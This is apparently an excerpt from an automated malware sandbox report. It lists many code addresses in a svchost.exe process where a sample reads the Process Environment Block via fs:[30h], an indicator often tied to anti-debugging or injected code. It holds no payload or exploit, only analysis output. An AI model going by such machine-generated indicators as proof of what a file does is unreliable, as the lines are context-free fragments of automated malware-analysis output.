                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h] | 2_2_032D2000
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h] | 2_2_0324E016
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h] | 2_2_0324E016
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h] | 2_2_0324E016
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h] | 2_2_0324E016
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0325C073 mov eax, dword ptr fs:[00000030h] | 2_2_0325C073
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03232050 mov eax, dword ptr fs:[00000030h] | 2_2_03232050
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B6050 mov eax, dword ptr fs:[00000030h] | 2_2_032B6050
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032280A0 mov eax, dword ptr fs:[00000030h] | 2_2_032280A0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C80A8 mov eax, dword ptr fs:[00000030h] | 2_2_032C80A8
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032F60B8 mov eax, dword ptr fs:[00000030h] | 2_2_032F60B8
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032F60B8 mov ecx, dword ptr fs:[00000030h] | 2_2_032F60B8
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323208A mov eax, dword ptr fs:[00000030h] | 2_2_0323208A
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322A0E3 mov ecx, dword ptr fs:[00000030h] | 2_2_0322A0E3
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032380E9 mov eax, dword ptr fs:[00000030h] | 2_2_032380E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B60E0 mov eax, dword ptr fs:[00000030h]2_2_032B60E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C0F0 mov eax, dword ptr fs:[00000030h]2_2_0322C0F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032720F0 mov ecx, dword ptr fs:[00000030h]2_2_032720F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B20DE mov eax, dword ptr fs:[00000030h]2_2_032B20DE
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]2_2_0326C720
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]2_2_0326C720
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]2_2_0326273C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov ecx, dword ptr fs:[00000030h]2_2_0326273C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]2_2_0326273C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AC730 mov eax, dword ptr fs:[00000030h]2_2_032AC730
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C700 mov eax, dword ptr fs:[00000030h]2_2_0326C700
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230710 mov eax, dword ptr fs:[00000030h]2_2_03230710
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260710 mov eax, dword ptr fs:[00000030h]2_2_03260710
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238770 mov eax, dword ptr fs:[00000030h]2_2_03238770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov esi, dword ptr fs:[00000030h]2_2_0326674D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]2_2_0326674D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]2_2_0326674D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230750 mov eax, dword ptr fs:[00000030h]2_2_03230750
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE75D mov eax, dword ptr fs:[00000030h]2_2_032BE75D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]2_2_03272750
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]2_2_03272750
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4755 mov eax, dword ptr fs:[00000030h]2_2_032B4755
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032307AF mov eax, dword ptr fs:[00000030h]2_2_032307AF
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E47A0 mov eax, dword ptr fs:[00000030h]2_2_032E47A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D678E mov eax, dword ptr fs:[00000030h]2_2_032D678E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE7E1 mov eax, dword ptr fs:[00000030h]2_2_032BE7E1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]2_2_032347FB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]2_2_032347FB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323C7C0 mov eax, dword ptr fs:[00000030h]2_2_0323C7C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B07C3 mov eax, dword ptr fs:[00000030h]2_2_032B07C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E627 mov eax, dword ptr fs:[00000030h]2_2_0324E627
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03266620 mov eax, dword ptr fs:[00000030h]2_2_03266620
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268620 mov eax, dword ptr fs:[00000030h]2_2_03268620
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323262C mov eax, dword ptr fs:[00000030h]2_2_0323262C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE609 mov eax, dword ptr fs:[00000030h]2_2_032AE609
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272619 mov eax, dword ptr fs:[00000030h]2_2_03272619
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]2_2_032F866E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]2_2_032F866E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]2_2_0326A660
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]2_2_0326A660
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03262674 mov eax, dword ptr fs:[00000030h]2_2_03262674
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324C640 mov eax, dword ptr fs:[00000030h]2_2_0324C640
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C6A6 mov eax, dword ptr fs:[00000030h]2_2_0326C6A6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032666B0 mov eax, dword ptr fs:[00000030h]2_2_032666B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]2_2_03234690
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]2_2_03234690
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]2_2_032B06F1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]2_2_032B06F1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0326A6C7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A6C7 mov eax, dword ptr fs:[00000030h]2_2_0326A6C7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6500 mov eax, dword ptr fs:[00000030h]2_2_032C6500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]2_2_03238550
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]2_2_03238550
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]2_2_032545B1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]2_2_032545B1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232582 mov eax, dword ptr fs:[00000030h]2_2_03232582
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232582 mov ecx, dword ptr fs:[00000030h]2_2_03232582
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264588 mov eax, dword ptr fs:[00000030h]2_2_03264588
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E59C mov eax, dword ptr fs:[00000030h]2_2_0326E59C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032325E0 mov eax, dword ptr fs:[00000030h]2_2_032325E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]2_2_0326C5ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]2_2_0326C5ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]2_2_0326E5CF
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]2_2_0326E5CF
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032365D0 mov eax, dword ptr fs:[00000030h]2_2_032365D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]2_2_0326A5D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]2_2_0326A5D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C427 mov eax, dword ptr fs:[00000030h]2_2_0322C427
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC460 mov ecx, dword ptr fs:[00000030h]2_2_032BC460
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA456 mov eax, dword ptr fs:[00000030h]2_2_032EA456
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322645D mov eax, dword ptr fs:[00000030h]2_2_0322645D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325245A mov eax, dword ptr fs:[00000030h]2_2_0325245A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032364AB mov eax, dword ptr fs:[00000030h]2_2_032364AB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032644B0 mov ecx, dword ptr fs:[00000030h]2_2_032644B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BA4B0 mov eax, dword ptr fs:[00000030h]2_2_032BA4B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA49A mov eax, dword ptr fs:[00000030h]2_2_032EA49A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032304E5 mov ecx, dword ptr fs:[00000030h]2_2_032304E5
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]2_2_0325EB20
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]2_2_0325EB20
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]2_2_032F8B28
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]2_2_032F8B28
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304B00 mov eax, dword ptr fs:[00000030h]2_2_03304B00
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322CB7E mov eax, dword ptr fs:[00000030h]2_2_0322CB7E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]2_2_032E4B4B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]2_2_032E4B4B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]2_2_03302B57
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]2_2_03302B57
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]2_2_03302B57
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]2_2_03302B57
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]2_2_032C6B40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]2_2_032C6B40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FAB40 mov eax, dword ptr fs:[00000030h]2_2_032FAB40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D8B42 mov eax, dword ptr fs:[00000030h]2_2_032D8B42
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228B50 mov eax, dword ptr fs:[00000030h]2_2_03228B50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEB50 mov eax, dword ptr fs:[00000030h]2_2_032DEB50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]2_2_03240BBE
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]2_2_03240BBE
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]2_2_032E4BB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]2_2_032E4BB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EBFC mov eax, dword ptr fs:[00000030h]2_2_0325EBFC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BCBF0 mov eax, dword ptr fs:[00000030h]2_2_032BCBF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEBD0 mov eax, dword ptr fs:[00000030h]2_2_032DEBD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA24 mov eax, dword ptr fs:[00000030h]2_2_0326CA24
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EA2E mov eax, dword ptr fs:[00000030h]2_2_0325EA2E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]2_2_03254A35
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]2_2_03254A35
